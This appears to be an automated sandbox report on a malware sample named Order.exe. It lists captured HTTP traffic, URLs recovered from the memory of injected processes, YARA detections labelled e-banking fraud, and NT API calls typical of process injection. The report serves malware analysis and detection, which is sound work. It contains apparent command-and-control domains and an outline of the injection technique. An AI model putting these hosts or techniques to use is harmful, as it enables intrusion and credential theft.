    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Content-Encoding: gzip
    Data Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 66 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 bd 97 f5 cc 99 00 00 00 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzFfzJaC0
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.26.1
    Date: Tue, 12 Nov 2024 14:32:23 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Content-Encoding: gzip
    Data Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 66 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 bd 97 f5 cc 99 00 00 00 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzFfzJaC0
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.26.1
    Date: Tue, 12 Nov 2024 14:32:26 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Content-Encoding: gzip
    Data Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 66 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 bd 97 f5 cc 99 00 00 00 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzFfzJaC0
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.26.1
    Date: Tue, 12 Nov 2024 14:32:29 GMT
    Content-Type: text/html
    Content-Length: 153
    Connection: close
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Tue, 12 Nov 2024 14:32:35 GMT
    Server: Apache
    Content-Length: 389
    Connection: close
    Content-Type: text/html
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Tue, 12 Nov 2024 14:32:37 GMT
    Server: Apache
    Content-Length: 389
    Connection: close
    Content-Type: text/html
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Tue, 12 Nov 2024 14:32:40 GMT
    Server: Apache
    Content-Length: 389
    Connection: close
    Content-Type: text/html
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Tue, 12 Nov 2024 14:32:43 GMT
    Server: Apache
    Content-Length: 389
    Connection: close
    Content-Type: text/html; charset=utf-8
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3126216814.0000000000A82000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.vibixx.site
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3126216814.0000000000A82000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.vibixx.site/4xim/
                Source: fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: fc.exe, 0000000C.00000002.3119481100.0000000003421000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: fc.exe, 0000000C.00000002.3119481100.0000000003421000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: fc.exe, 0000000C.00000002.3119481100.0000000003421000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: fc.exe, 0000000C.00000002.3119481100.0000000003421000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: fc.exe, 0000000C.00000002.3119481100.0000000003421000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: fc.exe, 0000000C.00000002.3119481100.0000000003421000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: fc.exe, 0000000C.00000003.2023618471.00000000083B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
                Source: fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000632C000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.0000000004A0C000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.ultrawin23.shop/53y2/?ZtwlQ=t/JS3aCWZhQCYNrXnvgf

                E-Banking Fraud

                Source: Yara match | File source: 9.2.Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.3126216814.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3127049322.0000000003750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3127133460.00000000037A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.1783850958.0000000001D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.1784067964.0000000003230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sample | Static PE information: Filename: Order.exe
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_0042C633 NtClose
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02B60 NtClose, LdrInitializeThunk
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02DF0 NtQuerySystemInformation, LdrInitializeThunk
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02C70 NtFreeVirtualMemory, LdrInitializeThunk
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A035C0 NtCreateMutant, LdrInitializeThunk
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A04340 NtSetContextThread
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A04650 NtSuspendThread
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02BA0 NtEnumerateValueKey
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02B80 NtQueryInformationFile
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02BE0 NtQueryValueKey
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02BF0 NtAllocateVirtualMemory
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02AB0 NtWaitForSingleObject
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02AF0 NtWriteFile
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02AD0 NtReadFile
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02DB0 NtEnumerateKey
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02DD0 NtDelayExecution
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02D30 NtUnmapViewOfSection
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02D00 NtSetInformationFile
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02D10 NtMapViewOfSection
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02CA0 NtQueryInformationToken
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02CF0 NtOpenProcess
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02CC0 NtQueryVirtualMemory
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02C00 NtQueryInformationProcess
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02C60 NtCreateKey
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02FA0 NtQuerySection
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02FB0 NtResumeThread
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02F90 NtProtectVirtualMemory
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02FE0 NtCreateFile
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02F30 NtCreateSection
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02F60 NtCreateProcessEx
                Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01A02EA0 NtAdjustPrivilegesToken
